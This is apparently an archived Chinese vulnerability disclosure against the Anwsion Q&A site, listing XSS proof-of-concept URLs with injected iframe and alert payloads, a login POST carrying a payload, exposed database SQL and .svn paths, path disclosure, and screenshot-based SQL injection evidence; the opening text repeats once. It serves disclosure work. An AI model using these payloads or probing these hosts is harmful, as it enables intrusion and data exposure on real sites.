### 简要描述: 再忽略就泪奔了。 ### 详细说明: 1.XSS ``` http://wenda.anwsion.com/home/explore/category-3%22%3E%3Ciframe%20src=//www.baidu.com%3E http://wenda.anwsion.com/home/explore/page-5__sort_type-hot__category-3_%22%3E%3Ciframe%20onload=alert(/xss/)%3E-1 http://wenda.anwsion.com/search/q-MTwvdGl0bGU+MTxTY1JpUHQgPmFsZXJ0KC94c3MvKTwvU2NSaVB0Pg==#all http://dev.anwsion.com/?q="><iframe onload=alert(/xss/)> http://dev.anwsion.com/?act=login POST:password=password&referer="><iframe onload=alert(1)>&username=hehe ``` 2.数据库信息泄漏 http://dev.anwsion.com/sql/install/database.sql 3.路径泄漏 http://dev.anwsion.com/i/?act=getentry&page[]=1 4.SVN http://static.anwsion.com/.svn/entries http://static.anwsion.com/admin/.svn/entries 5.SQL注入(见图) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201210/16214329a82c2de5f0fa7fb98781a2eaf1c1c5b2.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/16214329a82c2de5f0fa7fb98781a2eaf1c1c5b2.jpg) [<img...
### 简要描述: 再忽略就泪奔了。 ### 详细说明: 1.XSS ``` http://wenda.anwsion.com/home/explore/category-3%22%3E%3Ciframe%20src=//www.baidu.com%3E http://wenda.anwsion.com/home/explore/page-5__sort_type-hot__category-3_%22%3E%3Ciframe%20onload=alert(/xss/)%3E-1 http://wenda.anwsion.com/search/q-MTwvdGl0bGU+MTxTY1JpUHQgPmFsZXJ0KC94c3MvKTwvU2NSaVB0Pg==#all http://dev.anwsion.com/?q="><iframe onload=alert(/xss/)> http://dev.anwsion.com/?act=login POST:password=password&referer="><iframe onload=alert(1)>&username=hehe ``` 2.数据库信息泄漏 http://dev.anwsion.com/sql/install/database.sql 3.路径泄漏 http://dev.anwsion.com/i/?act=getentry&page[]=1 4.SVN http://static.anwsion.com/.svn/entries http://static.anwsion.com/admin/.svn/entries 5.SQL注入(见图) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201210/16214329a82c2de5f0fa7fb98781a2eaf1c1c5b2.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/16214329a82c2de5f0fa7fb98781a2eaf1c1c5b2.jpg) [<img src="https://images.seebug.org/upload/201210/1621431822d99cc088cff9e0762dc129933404ee.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/1621431822d99cc088cff9e0762dc129933404ee.jpg) [<img src="https://images.seebug.org/upload/201210/16214311bf7e65fccc4940778b6b9a2a0e07f780.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/16214311bf7e65fccc4940778b6b9a2a0e07f780.jpg) [<img src="https://images.seebug.org/upload/201210/16214306b4f81363c91aad8fd70bbe16cc3f8d8c.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/16214306b4f81363c91aad8fd70bbe16cc3f8d8c.jpg) [<img src="https://images.seebug.org/upload/201210/16214301f3ebd6517484c4a726b585ecfc5d9501.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/16214301f3ebd6517484c4a726b585ecfc5d9501.jpg) [<img src="https://images.seebug.org/upload/201210/162142569393761ba6178f7e733320f21b44dd75.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/162142569393761ba6178f7e733320f21b44dd75.jpg) [<img src="https://images.seebug.org/upload/201210/16214251133650f2f90fb1140449da4dcc9a4b1b.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/16214251133650f2f90fb1140449da4dcc9a4b1b.jpg) [<img src="https://images.seebug.org/upload/201210/162142409b6016f6e84fc9de2ead295e61f82316.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/162142409b6016f6e84fc9de2ead295e61f82316.jpg)